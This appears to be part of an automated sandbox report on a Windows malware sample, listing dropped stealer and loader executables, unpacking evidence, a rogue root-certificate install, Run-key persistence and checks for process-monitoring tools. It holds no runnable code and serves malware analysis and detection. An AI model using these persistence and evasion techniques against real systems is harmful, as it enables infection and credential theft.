Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 1925120 > 1048576

Source: file.exe

Static PE information: Raw size of ifufhtja is bigger than: 0x100000 < 0x1a4600

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000015.00000002.2385338281.0000000069AED000.00000002.00000001.01000000.00000020.sdmp, svchost015.exe, 0000001D.00000002.2953116563.000000006A5ED000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: .pdb8 source: axplong.exe, 00000009.00000003.2664280085.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3830428963.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: F:\OptimalSnake\Notepad\obj\Release\OpticAbyssmal.pdbLk source: acentric.exe, 0000001B.00000000.2214224431.0000000000412000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000015.00000002.2385338281.0000000069AED000.00000002.00000001.01000000.00000020.sdmp, svchost015.exe, 0000001D.00000002.2953116563.000000006A5ED000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: F:\OptimalSnake\Notepad\obj\Release\OpticAbyssmal.pdb source: acentric.exe, 0000001B.00000000.2214224431.0000000000412000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.210000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.210000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.210000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ifufhtja:EW;wxnzvpao:EW;.taggant:EW;

Source: 66ed86be077bb_12[1].exe.9.dr

Static PE information: 0xAB67955D [Tue Feb 15 11:26:21 2061 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: newbundle2[1].exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x4f134
Source: crypted[1].exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x52b78
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d968e should be: 0x1e0c22
Source: file.exe	Static PE information: real checksum: 0x1d968e should be: 0x1e0c22
Source: crypted.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x52b78
Source: newbundle2.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x4f134

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ifufhtja
Source: file.exe	Static PE information: section name: wxnzvpao
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: ifufhtja
Source: axplong.exe.0.dr	Static PE information: section name: wxnzvpao
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: 2[1].exe.9.dr	Static PE information: section name: /4
Source: 2[1].exe.9.dr	Static PE information: section name: /14
Source: 2[1].exe.9.dr	Static PE information: section name: /29
Source: 2[1].exe.9.dr	Static PE information: section name: /41
Source: 2[1].exe.9.dr	Static PE information: section name: /55
Source: 2[1].exe.9.dr	Static PE information: section name: /67
Source: 2[1].exe.9.dr	Static PE information: section name: /80
Source: 2[1].exe.9.dr	Static PE information: section name: /91
Source: 2[1].exe.9.dr	Static PE information: section name: /102
Source: 2.exe.9.dr	Static PE information: section name: /4
Source: 2.exe.9.dr	Static PE information: section name: /14
Source: 2.exe.9.dr	Static PE information: section name: /29
Source: 2.exe.9.dr	Static PE information: section name: /41
Source: 2.exe.9.dr	Static PE information: section name: /55
Source: 2.exe.9.dr	Static PE information: section name: /67
Source: 2.exe.9.dr	Static PE information: section name: /80
Source: 2.exe.9.dr	Static PE information: section name: /91
Source: 2.exe.9.dr	Static PE information: section name: /102

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_0022D84C push ecx; ret	9_2_0022D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027F0A5 push edi; mov dword ptr [esp], eax	9_1_0027F2C4
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027EF62 push 327C9ACAh; mov dword ptr [esp], ecx	9_1_0027F773
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027D06F push 2A577AF4h; mov dword ptr [esp], ecx	9_1_0027D80C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00299AFC push ebx; mov dword ptr [esp], 00000000h	9_1_00299BC0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00299AFC push edx; mov dword ptr [esp], ecx	9_1_00299C50
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00299AFC push 76964DF9h; mov dword ptr [esp], edx	9_1_00299C82
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00282933 push FFFFFF81h; iretd	9_1_00282935
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027F513 push dword ptr [edi-17h]; iretd	9_1_0027F518
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027ED7E push ebp; iretd	9_1_0027ED7F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00281171 push 0DFCFC5Dh; mov dword ptr [esp], eax	9_1_0028586B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027DB4F push ebx; iretd	9_1_0027DB50
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_002AF3A5 push eax; mov dword ptr [esp], 6D30B231h	9_1_002AF48E
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_002AF3A5 push edx; mov dword ptr [esp], eax	9_1_002AF49F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_002AF3A5 push ecx; mov dword ptr [esp], edx	9_1_002AF4DD
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_002AF3A5 push ecx; mov dword ptr [esp], esi	9_1_002AF50E
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027CFB5 push 3CF79BF0h; mov dword ptr [esp], ecx	9_1_0027D493
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0029CDB0 push ecx; mov dword ptr [esp], edx	9_1_0029CE04
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0029CDB0 push ebx; mov dword ptr [esp], edx	9_1_0029CE60
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0029CDB0 push 139C7AF4h; mov dword ptr [esp], esi	9_1_0029CE6F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_00281B80 push ds; retf	9_1_00281B89
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Code function: 10_2_031F2D89 push eax; retn 0071h	10_2_031F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0516E090 push es; ret	12_2_0516E0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0516C9C0 push es; ret	12_2_0516C9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0516D871 push es; ret	12_2_0516D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065BEFB2 push eax; ret	12_2_065BEFC1
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Code function: 14_2_026A2801 push eax; retn 0071h	14_2_026A2802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00428E7D push esi; ret	16_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004076E0 push ecx; ret	16_2_004076F3
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001B7333 push 04EC839Eh; mov dword ptr [esp], edi	17_2_001B733A

Source: file.exe	Static PE information: section name: entropy: 7.984869824803828
Source: file.exe	Static PE information: section name: ifufhtja entropy: 7.953498152994367
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.984869824803828
Source: axplong.exe.0.dr	Static PE information: section name: ifufhtja entropy: 7.953498152994367
Source: crypted[1].exe.9.dr	Static PE information: section name: .text entropy: 7.994735225546955
Source: crypted.exe.9.dr	Static PE information: section name: .text entropy: 7.994735225546955

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	File created: C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\607698\Waters.pif			Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	File created: C:\Users\user\AppData\Local\Temp\wZcULqdrBkDQvQgfGRYD.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\LummaC222222[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000321001\2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	File created: C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\gold[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	File created: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\needmoney[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\JavvvUmar[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	File created: C:\Users\user\Pictures\Opportunistic Telegraph\acentric.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000343001\5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\12dsvc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce acentric

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
